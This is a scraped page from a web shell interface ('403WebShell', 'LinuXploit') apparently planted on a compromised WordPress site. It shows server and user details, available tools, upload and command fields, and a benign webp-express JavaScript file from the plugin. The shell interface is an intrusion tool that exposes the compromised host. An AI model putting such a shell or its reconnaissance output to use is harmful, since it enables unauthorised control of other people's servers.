Warning: chmod(): No such file or directory in /home/tuempresavirtual.cl/public_html/wp-content/plugins/appointment-hour-booking/app-booking-plugin.php on line 3
403WebShell
403Webshell
Server IP : 186.64.123.29  /  Your IP : 216.73.217.94
Web Server : LiteSpeed
System : Linux house.hostinglat.cl 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : tuemp9827 ( 1016)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tuempresavirtual.cl/public_html/wp-content/plugins/webp-express/lib/wcfm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tuempresavirtual.cl/public_html/wp-content/plugins/webp-express/lib/wcfm/wcfm-options.js
window["wcfmoptions"] = {};

window["wcfmoptions"]['poster'] = function(action, options, successCallback, errorCallback) {

  //console.log('wcfmoptions.poster called. Action: ' + action);
  console.log('wcfmoptions.poster called. Options: ' + JSON.stringify(options));

  // Call the API
  var data = {
      'action': 'webpexpress-wcfm-api',
      'nonce' : window.webpExpressWCFMNonce,
      'command': action,
      //'args': options
      'args': JSON.stringify(options)
  };

  jQuery.ajax({
    type: "POST",
    url: ajaxurl,
    data: data,
    //contentType: "application/json; charset=utf-8",
    dataType: 'text',   // text or json?
    timeout: 30000,
    error: function (jqXHR, status, errorThrown) {
      console.log(errorThrown);
    },
    /*success: function(responseObj) {
      console.log('ajax response', responseObj);
      successCallback(responseObj);
    }*/

    success: function(responseText) {
      //console.log('ajax response', responseText);
      //response = "[{name:'hello'}]";
      //console.log('response:');
      //console.log(responseText);
      try {
          responseObj = JSON.parse(responseText);
      } catch (e) {
        console.log('The "' + action + '" response could not be parsed as JSON. ' + e.name + ':' + e.message);
        console.log('response:' + responseText);
        errorCallback(responseText);
        return
      }
      successCallback(responseObj);
    }
  });
}

function adjustWCFMHeight() {
  var usedHeight =
    document.getElementById('wpadminbar').offsetHeight +
    document.getElementById('wpfooter').offsetHeight +
    document.getElementById('screen-meta').offsetHeight +
    document.getElementById('wcfmintro').offsetHeight;

  var wcfm = document.getElementById('webpconvert-filemanager');

  var h = Math.max(document.body.clientHeight - usedHeight - 30, 300);
  //console.log('setting height', h, document.body.clientHeight, usedHeight);
  wcfm.style.height = h + 'px';
}

window.addEventListener('load', function(event) {
  adjustWCFMHeight();
});


window.addEventListener('resize', function(event) {
  adjustWCFMHeight();
});

Youez - 2016 - github.com/yon3zu
LinuXploit